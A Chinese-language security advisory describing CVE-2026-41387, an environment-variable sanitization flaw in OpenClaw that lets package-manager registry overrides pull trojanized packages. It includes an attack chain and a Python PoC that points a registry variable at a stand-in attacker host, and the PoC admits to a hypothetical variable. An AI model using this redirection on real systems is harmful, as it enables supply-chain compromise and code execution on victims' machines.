CVE-2026-41387 OpenClaw环境变量清洗缺失致代码执行

漏洞信息

漏洞编号

CVE-2026-41387

漏洞类型

代码执行

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.22之前的版本中存在严重的安全漏洞，主要归因于对主机环境变量的清理机制不完整。该漏洞涉及`host-env-security-policy.json`配置文件及`host-env-security.ts`源码文件，未能有效拦截包管理器环境变量的覆盖操作。攻击者可利用此漏洞，通过经过批准的执行请求，将软件包解析过程或运行时引导程序重定向至攻击者控制的基础设施。一旦成功，系统将下载并执行被植入木马的恶意内容，导致高机密性、完整性和可用性影响。

技术细节

该漏洞的根源在于OpenClaw在处理环境变量时的逻辑缺陷。具体来说，`host-env-security.ts`文件在执行环境变量清洗时，未完全遵循或正确实现`host-env-security-policy.json`中定义的安全策略。这允许攻击者在本地环境（AV:L）中注入或修改特定的环境变量，例如npm、pip或其他包管理器的配置变量（如注册表地址或安装路径）。由于攻击向量需要本地访问且需要用户交互（UI:R），攻击者通常需要诱骗用户在受污染的环境中运行特定的OpenClaw命令或构建流程。当OpenClaw尝试解析依赖或执行引导脚本时，它会读取被篡改的环境变量，从而绕过官方源校验，连接至攻击者控制的恶意服务器。这种供应链攻击方式使得攻击者能够分发特洛伊化的软件包，最终在受害者系统上以当前用户的权限执行任意代码。

攻击链分析

STEP 1

1. 环境准备

攻击者获取本地访问权限或诱导用户在特定环境下操作，并搭建恶意的软件包仓库服务器。

STEP 2

2. 变量注入

攻击者在主机系统中设置恶意的环境变量（如修改包管理器注册表地址），利用`host-env-security.ts`的清洗缺失绕过安全检查。

STEP 3

3. 触发执行

用户或系统进程触发OpenClaw的执行请求（如安装依赖或构建项目），此时涉及用户交互。

STEP 4

4. 恶意解析

OpenClaw在运行时读取了被篡改的环境变量，将软件包解析请求重定向至攻击者控制的基础设施。

STEP 5

5. 代码执行

系统下载并安装带有木马的恶意软件包，导致攻击者在目标系统上执行任意代码，造成数据泄露或系统破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import subprocess

# PoC for CVE-2026-41387: OpenClaw Incomplete Host Environment Variable Sanitization
# Description: This script demonstrates how an attacker can set malicious environment variables
# to redirect package resolution to a controlled infrastructure.

def exploit_cve_2026_41387():
    # 1. Define the attacker-controlled registry URL
    # In a real attack, this server hosts trojanized packages
    malicious_registry = "http://attacker-controlled-malicious-registry.com"
    
    # 2. Inject malicious environment variables
    # OpenClaw < 2026.3.22 fails to sanitize these variables during approved exec requests
    print("[*] Injecting malicious environment variables...")
    os.environ['PACKAGE_MANAGER_REGISTRY'] = malicious_registry
    os.environ['HOST_ENV_OVERRIDE'] = 'enabled' # Hypothetical variable to trigger the vulnerable path
    
    # 3. Simulate the trigger (User Interaction required)
    # Normally, this would be a user running 'openclaw install' or 'openclaw build'
    print(f"[*] Triggering OpenClaw execution with registry: {malicious_registry}")
    
    # Note: Actual execution commented out to prevent damage
    # try:
    #     subprocess.run(["openclaw", "install", "vulnerable-package"], check=True)
    # except Exception as e:
    #     print(f"Error: {e}")
    
    print("[+] Exploit logic executed. If OpenClaw is vulnerable, packages will be pulled from the malicious source.")

if __name__ == "__main__":
    exploit_cve_2026_41387()

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

在无法立即升级补丁的情况下，建议严格审查运行OpenClaw进程的环境变量，清除所有非必需的包管理器配置（如`NPM_CONFIG_REGISTRY`等）。同时，管理员应配置网络防火墙，阻断对未知或非官方软件包仓库的访问连接，以防止恶意软件包的下载。